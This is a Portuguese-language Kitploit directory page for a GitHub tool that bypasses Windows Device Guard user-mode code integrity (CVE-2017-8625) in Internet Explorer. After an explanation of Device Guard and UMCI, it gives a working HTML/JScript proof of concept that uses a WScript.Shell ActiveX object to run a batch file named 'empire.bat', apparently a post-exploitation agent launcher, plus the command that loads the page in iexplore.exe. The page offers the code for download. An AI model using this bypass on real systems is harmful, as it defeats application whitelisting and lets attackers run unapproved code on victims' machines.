Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2017-8625_Bypass_UMCI — Recurso de bypass do UMCI no Internet Explorer | Kitploit
Ferramentas/GitHubGitHub/homjxi0e/cve-2017-8625_bypass_umci
Escalada de PrivilégiosAnálise de CódigoExploraçãoExploração de Aplicações WebTestes de PenetraçãoDesenvolvimento de Payloads
GitHubhomjxi0e/cve-2017-8625_bypass_umci

CVE-2017-8625_Bypass_UMCI

Recurso de bypass do UMCI no Internet Explorer

Ver Repositório
11há 8 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

o que é ! Windows Defender Device Guard !


Windows Defender Device Guard é uma combinação de recursos de segurança de hardware e software relacionados a empresas que, quando configurados juntos, bloquearão um dispositivo para que ele execute apenas aplicativos confiáveis que você define em suas políticas de integridade de código. Se o aplicativo não for confiável, ele não pode ser executado, ponto final. Com hardware que atende aos requisitos básicos, isso também significa que mesmo que um invasor consiga obter controle do kernel do Windows, ele ou ela terá muito menos probabilidade de executar código executável malicioso. Com hardware apropriado, o Windows Defender Device Guard pode usar a nova segurança baseada em virtualização do Windows 10 (disponível nas SKUs Enterprise e Education para desktop e em todas as SKUs Server) para isolar o serviço de Integridade de Código do próprio kernel do Microsoft Windows. Nesse caso, o serviço de Integridade de Código é executado junto com o kernel em um contêiner protegido por hipervisor do Windows. Este guia explora os recursos individuais do Windows Defender Device Guard, bem como como planejar, configurar e implantá-los. Ele inclui:

o que é UMCI

UMCI impede que binários não aprovados sejam executados, restringe o Windows Scripting Host e coloca o PowerShell no modo de linguagem restrita. Isso torna a obtenção de execução de código em um sistema bastante desafiadora. Este post vai

======================================================================||>

bypass UMCI no Internet Explorer usando Jscript !

Vamos mostrar um bypass de código

======================================================================||>

root@kitploit:~
<html>
  <body>
    <script type="text/jscript">
      var r = new ActiveXObject("WScript.Shell").Run("empire.bat");
    </script>
   </body>
</html>

======================================================================||>

root@kitploit:~
PS:>  C:\Users\Homjxie> cmd /C "C:\Program Files\Internet Explorer\iexplore.exe " "C:\Users\Homjxie\Desktop\Homjxie.html"

Modificar Código Jscript !

screenshot from 2017-08-25 11-55-12 ======================================================================||>

Próximo bypass de execução

screenshot from 2017-08-25 11-56-01

======================================================================||> ======================================================================||>

Explicação do Autor

@Matt Homjxi0e

Autor do Bypass

@enigma0x3

Baixar ferramenta